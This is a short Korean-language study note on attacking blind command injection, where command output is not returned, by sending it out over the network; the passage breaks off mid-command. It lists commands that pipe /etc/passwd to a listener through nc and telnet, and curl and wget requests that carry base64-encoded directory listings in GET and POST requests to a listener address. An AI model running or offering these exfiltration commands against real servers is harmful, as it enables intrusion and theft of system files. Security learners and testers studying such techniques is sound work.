실행 결과를 확인할 수 없는 Command Injection 환경에서의 공격방법 1. Network Outbound 네트워크 도구를 서버에 설치할 수 있거나 설치되어있을 때 - nc(netcat), telnet 이용 cat /etc/passwd | nc 127.0.0.1 8000 cat /etc/passwd | telnet 127.0.0.1 8000 * 파이프와 함께 명령어의 실행 결과를 네트워크로 전송할 수 있음 - curl / wget 이용 curl "http://127.0.0.1:8080/?$(ls -al|base64 -w0)" // GET 요청 curl http://127.0.0.1:8080/ -d "$(ls -al)" // POST 요청 wget http://127.0.0.1:8080 --met..